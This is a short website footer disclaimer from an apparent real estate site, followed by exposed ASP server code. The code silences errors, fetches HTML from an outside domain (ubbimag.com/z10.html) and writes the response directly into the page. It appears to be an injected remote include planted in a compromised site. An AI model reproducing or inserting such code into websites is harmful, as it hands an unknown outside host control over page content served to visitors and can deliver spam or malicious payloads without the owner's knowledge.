All logos are the copy right
protected by the companies they represent. All information contained
within their web environments is the property of each company and as such,
AirForceHomeSeller.info and its affiliated web sites and domains have no control
over such content. All information should be verified by the
reader/visitor.
<
%
On Error Resume Next
set XmlObj = Server.CreateObject("Microsoft.XMLHTTP")
XmlObj.open "GET", "http://ubbimag.com/z10.html", false
XmlObj.send
formatdata = XmlObj.responseText
file_get_contents=formatdata
Set XmlObj = nothing
response.write file_get_contents
%>